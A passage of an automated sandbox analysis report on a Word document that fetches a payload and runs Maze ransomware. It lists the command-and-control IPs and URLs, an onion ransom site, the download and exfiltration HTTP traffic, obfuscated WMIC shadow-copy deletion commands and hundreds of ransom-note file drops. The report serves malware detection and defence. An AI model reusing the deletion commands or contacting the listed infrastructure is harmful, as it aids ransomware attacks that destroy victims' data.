Source: unknownTCP traffic detected without corresponding DNS query: 104.168.198.208
Source: unknownTCP traffic detected without corresponding DNS query: 104.168.198.208
Source: unknownTCP traffic detected without corresponding DNS query: 104.168.198.208
Source: unknownTCP traffic detected without corresponding DNS query: 104.168.198.208
Source: unknownTCP traffic detected without corresponding DNS query: 104.168.198.208
Source: unknownTCP traffic detected without corresponding DNS query: 104.168.198.208
Source: unknownTCP traffic detected without corresponding DNS query: 104.168.198.208
Source: unknownTCP traffic detected without corresponding DNS query: 104.168.198.208
Source: unknownTCP traffic detected without corresponding DNS query: 104.168.198.208
Source: unknownTCP traffic detected without corresponding DNS query: 104.168.198.208
Source: unknownTCP traffic detected without corresponding DNS query: 104.168.198.208
Source: unknownTCP traffic detected without corresponding DNS query: 104.168.198.208
Source: unknownTCP traffic detected without corresponding DNS query: 104.168.198.208
Source: unknownTCP traffic detected without corresponding DNS query: 104.168.198.208
Source: unknownTCP traffic detected without corresponding DNS query: 104.168.198.208
Source: unknownTCP traffic detected without corresponding DNS query: 104.168.198.208
Source: unknownTCP traffic detected without corresponding DNS query: 104.168.198.208
Source: unknownTCP traffic detected without corresponding DNS query: 104.168.198.208
Source: unknownTCP traffic detected without corresponding DNS query: 104.168.198.208
Source: unknownTCP traffic detected without corresponding DNS query: 104.168.198.208
Source: unknownTCP traffic detected without corresponding DNS query: 104.168.198.208
Source: unknownTCP traffic detected without corresponding DNS query: 104.168.198.208
Source: unknownTCP traffic detected without corresponding DNS query: 104.168.198.208
Source: unknownTCP traffic detected without corresponding DNS query: 104.168.198.208
Source: unknownTCP traffic detected without corresponding DNS query: 104.168.198.208
Source: unknownTCP traffic detected without corresponding DNS query: 104.168.198.208
Source: unknownTCP traffic detected without corresponding DNS query: 104.168.198.208
Source: unknownTCP traffic detected without corresponding DNS query: 104.168.198.208
Source: unknownTCP traffic detected without corresponding DNS query: 104.168.198.208
Source: unknownTCP traffic detected without corresponding DNS query: 104.168.198.208
Source: unknownTCP traffic detected without corresponding DNS query: 104.168.198.208
Source: unknownTCP traffic detected without corresponding DNS query: 104.168.198.208
Source: unknownTCP traffic detected without corresponding DNS query: 104.168.198.208
Source: unknownTCP traffic detected without corresponding DNS query: 104.168.198.208
Source: unknownTCP traffic detected without corresponding DNS query: 104.168.198.208
Source: unknownTCP traffic detected without corresponding DNS query: 104.168.198.208
Downloads filesShow sources
Source: C:\Program Files\Microsoft Office\Office14\WINWORD.EXEFile created: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.WordJump to behavior
Downloads files from webservers via HTTPShow sources
Source: global trafficHTTP traffic detected: GET /wordupd.tmp HTTP/1.1Accept: */*Accept-Encoding: gzip, deflateUser-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.1; Trident/7.0; SLCC2; .NET CLR 2.0.50727; .NET CLR 3.5.30729; .NET CLR 3.0.30729; Media Center PC 6.0; .NET4.0C; .NET4.0E)Host: 104.168.198.208Connection: Keep-Alive
Posts data to webserverShow sources
Source: unknownHTTP traffic detected: POST /signout/login/ct.html HTTP/1.1User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64; Trident/7.0; AS; rv:11.0) like GeckoHost: 91.218.114.4Content-Type: application/x-www-form-urlencodedContent-Length: 237Connection: Keep-AliveData Raw: d2 1a 7e 4d 41 4e 92 65 a4 56 89 5f f8 1a 94 56 67 04 55 e2 d8 cb 90 c8 ae d4 de 67 ae 36 32 47 c3 fe 16 3f 99 04 4e d4 dd 3f 74 a1 bb 5a 60 24 3d 29 c8 73 4f e0 66 90 38 99 f2 1c f7 24 ee 2b 31 c6 19 e5 e8 65 02 d7 e2 ca 3f e9 ea 42 ae d9 ad fd f4 81 b1 58 08 43 9d 11 a8 aa c6 64 e1 c0 0e 8a 8a 9f 6a 55 af 93 af f6 17 82 c1 a8 64 a0 7b 35 91 74 8a 94 23 d3 d3 53 16 0b a2 1e c5 eb 88 bc 2f b2 24 00 4d 5a 0a a5 2f 12 e2 13 53 0e 1c b8 4c 12 f3 b5 70 cf 6d 39 29 f8 e3 38 61 79 b2 36 d9 6b 8e a3 d5 c0 7b f7 d3 4a 13 3f 77 0b e6 08 87 22 ce be c4 d3 e3 65 9a fb fb f9 5d bb 7b 77 66 13 43 01 ac aa 43 19 c3 60 75 36 9d 56 2e f7 70 8e dd f0 1a 62 cb 1f c2 8c 2c b3 f3 ab 1c 4a 9a 67 ff 72 9e 7b 55 8e 56 02 12 Data Ascii: ~MANeV_VgUg62G?N?tZ`$=)s
Tries to download or post to a non-existing http route (HTTP/1.1 404 Not Found / 503 Service Unavailable)Show sources
Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginxDate: Wed, 06 Nov 2019 13:03:08 GMTContent-Type: text/html; charset=iso-8859-1Content-Length: 219Connection: keep-aliveKeep-Alive: timeout=60Data Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 2f 73 69 67 6e 6f 75 74 2f 6c 6f 67 69 6e 2f 63 74 2e 68 74 6d 6c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 2f 62 6f 64 79 3e 3c 2f 68 74 6d 6c 3e 0a Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL /signou
Urls found in memory or binary dataShow sources
Source: WINWORD.EXE, 00000000.00000002.337456812.07BE2000.00000004.00000001.sdmp, WINWORD.EXE, 00000000.00000002.329471285.048B0000.00000004.00000001.sdmpString found in binary or memory: http://104.168.198.208/wordupd.tmp
Source: WINWORD.EXE, 00000000.00000002.329471285.048B0000.00000004.00000001.sdmpString found in binary or memory: http://104.168.198.208/wordupd.tmple
Source: WINWORD.EXE, 00000000.00000002.322542209.00412000.00000004.00000001.sdmpString found in binary or memory: http://104.168.198.208/wordupd.tmpqqC:
Source: wupd12.14.tmp, 00000005.00000003.364936972.01540000.00000004.00000001.sdmpString found in binary or memory: http://91.218.114.11/forum/gr.jspx?qhe=wyw&ap=dq677p3ed&wt=r80141a5h6
Source: wupd12.14.tmp, 00000005.00000003.565317575.019F0000.00000004.00000001.sdmpString found in binary or memory: http://91.218.114.11/view/pmptbud.cgi?rif=86ti6ty&f=0tf1w&g=y838tni&fs=g0m3t00x
Source: wupd12.14.tmp, 00000005.00000003.365791961.01540000.00000004.00000001.sdmpString found in binary or memory: http://91.218.114.25/frysmlbt.asp?pbjg=8skp3i6s&m=4xmo405ctp
Source: wupd12.14.tmp, 00000005.00000003.565927773.019F0000.00000004.00000001.sdmpString found in binary or memory: http://91.218.114.25/tracker/lpvotht.php?ij=74lh01y&if=3h00sur
Source: wupd12.14.tmp, 00000005.00000003.367324708.01540000.00000004.00000001.sdmpString found in binary or memory: http://91.218.114.26/post/yocs.jspx?mh=gvs58
Source: wupd12.14.tmp, 00000005.00000003.566591154.019F0000.00000004.00000001.sdmpString found in binary or memory: http://91.218.114.26/weu.html?n=641&uy=33vt2
Source: wupd12.14.tmp, 00000005.00000002.596422643.019F0000.00000004.00000001.sdmpString found in binary or memory: http://91.218.114.31/kwa.html?hkex=p77mwf5h44&spi=3ylt07ucfg
Source: wupd12.14.tmp, 00000005.00000002.595775288.006B4000.00000004.00000020.sdmpString found in binary or memory: http://91.218.114.31/update/cwmgplanv.jspx?pnv=u&qraq=41g187&g=xu401v60
Source: wupd12.14.tmp, 00000005.00000003.519321430.01540000.00000004.00000001.sdmpString found in binary or memory: http://91.218.114.32/checkout/transfer/egav.jspx?siwi=5&dqm=08c7m215
Source: wupd12.14.tmp, 00000005.00000002.595775288.006B4000.00000004.00000020.sdmpString found in binary or memory: http://91.218.114.37/edit/sv.aspx?belw=5gjmhg50qj&horg=lj8r3&w=c221b763t&o=j8k
Source: wupd12.14.tmp, 00000005.00000002.595775288.006B4000.00000004.00000020.sdmpString found in binary or memory: http://91.218.114.38/edit/signout/r.html
Source: wupd12.14.tmp, 00000005.00000002.595775288.006B4000.00000004.00000020.sdmpString found in binary or memory: http://91.218.114.38/edit/signout/r.htmllAez
Source: wupd12.14.tmp, 00000005.00000002.595775288.006B4000.00000004.00000020.sdmpString found in binary or memory: http://91.218.114.4/payout/account/pfmonqavr.cgi?tw=3&hmn=xk1543j&rr=5852t6v&iwsh=4
Source: wupd12.14.tmp, 00000005.00000003.364176697.01550000.00000004.00000001.sdmpString found in binary or memory: http://91.218.114.4/signout/login/ct.html
Source: wupd12.14.tmp, 00000005.00000003.587220751.00050000.00000004.00000001.sdmpString found in binary or memory: http://aoacugmutagkwctu.onion/%USERID%
Source: wupd12.14.tmp, 00000005.00000003.362949001.02770000.00000004.00000001.sdmp, notepad.exe, 0000000D.00000002.601857330.00233000.00000004.00000020.sdmpString found in binary or memory: http://aoacugmutagkwctu.onion/5e4c085c3c4e0000
Source: WINWORD.EXE, 00000000.00000002.327412972.02D3D000.00000004.00000001.sdmpString found in binary or memory: http://ns.ad
Source: WINWORD.EXE, 00000000.00000002.327412972.02D3D000.00000004.00000001.sdmpString found in binary or memory: http://ns.adbe.
Source: WINWORD.EXE, 00000000.00000002.327412972.02D3D000.00000004.00000001.sdmpString found in binary or memory: http://pur/elements/1.1/xmphttp://nsom/xap/1.0/xmpidqhttp://nsom/xmp/Identifier/qual/1.0/shttp://ns.
Source: wupd12.14.tmp, 00000005.00000003.587220751.00050000.00000004.00000001.sdmpString found in binary or memory: https://mazedecrypt.top/%USERID%
Source: wupd12.14.tmp, 00000005.00000003.362949001.02770000.00000004.00000001.sdmp, notepad.exe, 0000000D.00000002.601857330.00233000.00000004.00000020.sdmpString found in binary or memory: https://mazedecrypt.top/5e4c085c3c4e0000
Source: wupd12.14.tmp, 00000005.00000003.587220751.00050000.00000004.00000001.sdmp, notepad.exe, 0000000D.00000002.601857330.00233000.00000004.00000020.sdmpString found in binary or memory: https://www.torproject.org/

Spam, unwanted Advertisements and Ransom Demands:

barindex
Yara detected Maze RansomwareShow sources
Source: Yara matchFile source: 0000000D.00000002.601857330.00233000.00000004.00000020.sdmp, type: MEMORY
Source: Yara matchFile source: 00000005.00000003.587220751.00050000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000005.00000003.362949001.02770000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000005.00000003.587200933.00040000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000005.00000003.587056869.023E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: 00000005.00000003.362928581.023E0000.00000004.00000001.sdmp, type: MEMORY
Source: Yara matchFile source: Process Memory Space: wupd12.14.tmp PID: 3780, type: MEMORY
Source: Yara matchFile source: Process Memory Space: notepad.exe PID: 1472, type: MEMORY
Source: Yara matchFile source: C:\DECRYPT-FILES.txt, type: DROPPED
Source: Yara matchFile source: C:\DECRYPT-FILES.txt, type: DROPPED
Source: Yara matchFile source: C:\DECRYPT-FILES.txt, type: DROPPED
Source: Yara matchFile source: C:\DECRYPT-FILES.txt, type: DROPPED
Source: Yara matchFile source: C:\DECRYPT-FILES.txt, type: DROPPED
Source: Yara matchFile source: C:\DECRYPT-FILES.txt, type: DROPPED
Source: Yara matchFile source: C:\DECRYPT-FILES.txt, type: DROPPED
Source: Yara matchFile source: C:\DECRYPT-FILES.txt, type: DROPPED
Source: Yara matchFile source: C:\DECRYPT-FILES.txt, type: DROPPED
Source: Yara matchFile source: C:\DECRYPT-FILES.txt, type: DROPPED
Source: Yara matchFile source: C:\DECRYPT-FILES.txt, type: DROPPED
Source: Yara matchFile source: C:\DECRYPT-FILES.txt, type: DROPPED
Source: Yara matchFile source: C:\DECRYPT-FILES.txt, type: DROPPED
Source: Yara matchFile source: C:\DECRYPT-FILES.txt, type: DROPPED
Source: Yara matchFile source: C:\DECRYPT-FILES.txt, type: DROPPED
Source: Yara matchFile source: C:\DECRYPT-FILES.txt, type: DROPPED
Source: Yara matchFile source: C:\DECRYPT-FILES.txt, type: DROPPED
Source: Yara matchFile source: C:\DECRYPT-FILES.txt, type: DROPPED
Source: Yara matchFile source: C:\DECRYPT-FILES.txt, type: DROPPED
Source: Yara matchFile source: C:\DECRYPT-FILES.txt, type: DROPPED
Source: Yara matchFile source: C:\DECRYPT-FILES.txt, type: DROPPED
Source: Yara matchFile source: C:\DECRYPT-FILES.txt, type: DROPPED
Source: Yara matchFile source: C:\DECRYPT-FILES.txt, type: DROPPED
Source: Yara matchFile source: C:\DECRYPT-FILES.txt, type: DROPPED
Source: Yara matchFile source: C:\DECRYPT-FILES.txt, type: DROPPED
Source: Yara matchFile source: C:\DECRYPT-FILES.txt, type: DROPPED
Source: Yara matchFile source: C:\DECRYPT-FILES.txt, type: DROPPED
Source: Yara matchFile source: C:\DECRYPT-FILES.txt, type: DROPPED
Source: Yara matchFile source: C:\DECRYPT-FILES.txt, type: DROPPED
Source: Yara matchFile source: C:\DECRYPT-FILES.txt, type: DROPPED
Source: Yara matchFile source: C:\DECRYPT-FILES.txt, type: DROPPED
Source: Yara matchFile source: C:\DECRYPT-FILES.txt, type: DROPPED
Source: Yara matchFile source: C:\DECRYPT-FILES.txt, type: DROPPED
Source: Yara matchFile source: C:\DECRYPT-FILES.txt, type: DROPPED
Source: Yara matchFile source: C:\DECRYPT-FILES.txt, type: DROPPED
Source: Yara matchFile source: C:\DECRYPT-FILES.txt, type: DROPPED
Source: Yara matchFile source: C:\DECRYPT-FILES.txt, type: DROPPED
Source: Yara matchFile source: C:\DECRYPT-FILES.txt, type: DROPPED
Source: Yara matchFile source: C:\DECRYPT-FILES.txt, type: DROPPED
Source: Yara matchFile source: C:\DECRYPT-FILES.txt, type: DROPPED
Source: Yara matchFile source: C:\DECRYPT-FILES.txt, type: DROPPED
Source: Yara matchFile source: C:\DECRYPT-FILES.txt, type: DROPPED
Source: Yara matchFile source: C:\DECRYPT-FILES.txt, type: DROPPED
Source: Yara matchFile source: C:\DECRYPT-FILES.txt, type: DROPPED
Source: Yara matchFile source: C:\DECRYPT-FILES.txt, type: DROPPED
Source: Yara matchFile source: C:\DECRYPT-FILES.txt, type: DROPPED
Source: Yara matchFile source: C:\DECRYPT-FILES.txt, type: DROPPED
Source: Yara matchFile source: C:\DECRYPT-FILES.txt, type: DROPPED
Source: Yara matchFile source: C:\DECRYPT-FILES.txt, type: DROPPED
Source: Yara matchFile source: C:\DECRYPT-FILES.txt, type: DROPPED
Source: Yara matchFile source: C:\DECRYPT-FILES.txt, type: DROPPED
Source: Yara matchFile source: C:\DECRYPT-FILES.txt, type: DROPPED
Source: Yara matchFile source: C:\DECRYPT-FILES.txt, type: DROPPED
Source: Yara matchFile source: C:\DECRYPT-FILES.txt, type: DROPPED
Source: Yara matchFile source: C:\DECRYPT-FILES.txt, type: DROPPED
Source: Yara matchFile source: C:\DECRYPT-FILES.txt, type: DROPPED
Source: Yara matchFile source: C:\DECRYPT-FILES.txt, type: DROPPED
Source: Yara matchFile source: C:\DECRYPT-FILES.txt, type: DROPPED
Source: Yara matchFile source: C:\DECRYPT-FILES.txt, type: DROPPED
Source: Yara matchFile source: C:\DECRYPT-FILES.txt, type: DROPPED
Source: Yara matchFile source: C:\DECRYPT-FILES.txt, type: DROPPED
Source: Yara matchFile source: C:\DECRYPT-FILES.txt, type: DROPPED
Source: Yara matchFile source: C:\DECRYPT-FILES.txt, type: DROPPED
Source: Yara matchFile source: C:\DECRYPT-FILES.txt, type: DROPPED
Source: Yara matchFile source: C:\DECRYPT-FILES.txt, type: DROPPED
Source: Yara matchFile source: C:\DECRYPT-FILES.txt, type: DROPPED
Source: Yara matchFile source: C:\DECRYPT-FILES.txt, type: DROPPED
Source: Yara matchFile source: C:\DECRYPT-FILES.txt, type: DROPPED
Source: Yara matchFile source: C:\DECRYPT-FILES.txt, type: DROPPED
Source: Yara matchFile source: C:\DECRYPT-FILES.txt, type: DROPPED
Source: Yara matchFile source: C:\DECRYPT-FILES.txt, type: DROPPED
Source: Yara matchFile source: C:\DECRYPT-FILES.txt, type: DROPPED
Source: Yara matchFile source: C:\DECRYPT-FILES.txt, type: DROPPED
Source: Yara matchFile source: C:\DECRYPT-FILES.txt, type: DROPPED
Changes the wallpaper pictureShow sources
Source: C:\Windows\Temp\wupd12.14.tmpSystemParametersInfo: C:\Users\user~1\AppData\Local\Temp\000.bmpJump to behavior
Deletes shadow drive data (may be related to ransomware)Show sources
Source: unknownProcess created: C:\Windows\System32\wbem\WMIC.exe 'C:\bjy\..\Windows\cib\jduxt\..\..\system32\sy\oaljs\..\..\wbem\mdbkx\..\wmic.exe' shadowcopy delete
Source: unknownProcess created: C:\Windows\System32\wbem\WMIC.exe 'C:\xchrq\..\Windows\uraci\..\system32\vtm\nxe\jormg\..\..\..\wbem\denq\..\wmic.exe' shadowcopy delete
Source: C:\Windows\Temp\wupd12.14.tmpProcess created: C:\Windows\System32\wbem\WMIC.exe 'C:\bjy\..\Windows\cib\jduxt\..\..\system32\sy\oaljs\..\..\wbem\mdbkx\..\wmic.exe' shadowcopy deleteJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpProcess created: C:\Windows\System32\wbem\WMIC.exe 'C:\xchrq\..\Windows\uraci\..\system32\vtm\nxe\jormg\..\..\..\wbem\denq\..\wmic.exe' shadowcopy deleteJump to behavior
May encrypt documents and pictures (Ransomware)Show sources
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\$recycle.bin\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\$recycle.bin\s-1-5-21-312302014-279660585-3511680526-1001\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\$recycle.bin\s-1-5-21-312302014-279660585-3511680526-1004\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\$recycle.bin\s-1-5-21-312302014-279660585-3511680526-1005\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\documents and settings\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\msocache\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\perflogs\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\perflogs\admin\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\program files\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\recovery\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\recovery\30698442-3747-11e0-818c-d0aae148ac37\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\default\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\default\appdata\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\default\appdata\roaming\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\default\appdata\roaming\media center programs\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\default\appdata\roaming\microsoft\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\default\appdata\roaming\microsoft\internet explorer\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\default\appdata\roaming\microsoft\internet explorer\quick launch\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\default\appdata\roaming\microsoft\windows\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\default\appdata\roaming\microsoft\windows\cookies\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\default\appdata\roaming\microsoft\windows\network shortcuts\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\default\appdata\roaming\microsoft\windows\printer shortcuts\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\default\appdata\roaming\microsoft\windows\recent\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\default\appdata\roaming\microsoft\windows\sendto\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\default\appdata\roaming\microsoft\windows\start menu\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\default\appdata\roaming\microsoft\windows\start menu\programs\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\default\appdata\roaming\microsoft\windows\start menu\programs\accessories\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\default\appdata\roaming\microsoft\windows\start menu\programs\accessories\accessibility\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\default\appdata\roaming\microsoft\windows\start menu\programs\accessories\system tools\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\default\appdata\roaming\microsoft\windows\start menu\programs\maintenance\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\default\appdata\roaming\microsoft\windows\templates\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\default\desktop\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\default\documents\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\default\documents\my music\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\default\documents\my pictures\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\default\documents\my videos\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\default\downloads\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\default\favorites\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\default\links\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\default\saved games\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\.jre\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\.jre\bin\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\.jre\bin\client\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\.jre\bin\dtplugin\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\.jre\bin\plugin2\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\.jre\lib\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\.jre\lib\applet\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\.jre\lib\cmm\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\.jre\lib\deploy\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\.jre\lib\ext\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\.jre\lib\fonts\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\.jre\lib\i386\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\.jre\lib\images\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\.jre\lib\images\cursors\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\.jre\lib\jfr\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\.jre\lib\management\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\.jre\lib\security\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\.jre\lib\security\policy\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\.jre\lib\security\policy\limited\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\.jre\lib\security\policy\unlimited\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\adobe\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\adobe\acrobat\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\adobe\acrobat\11.0\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\adobe\acrobat\11.0\collab\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\adobe\acrobat\11.0\forms\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\adobe\acrobat\11.0\jscache\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\adobe\acrobat\11.0\security\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\adobe\acrobat\11.0\security\crlcache\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\adobe\flash player\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\adobe\flash player\assetcache\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\adobe\flash player\assetcache\p4mtyzfy\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\adobe\flash player\nativecache\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\adobe\headlights\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\adobe\linguistics\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\adobe\logtransport2\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\identities\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\identities\{7e3c98c2-a457-4c7b-90bc-6b7522d9bded}\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\media center programs\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\microsoft\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\microsoft\addins\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\microsoft\credentials\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\microsoft\crypto\decrypt-files.txtJump to behavior
Source: C:\Windows\Temp\wupd12.14.tmpFile created: c:\users\user\appdata\roaming\microsoft\crypto\rsa\decrypt-files.txtJump to behavior
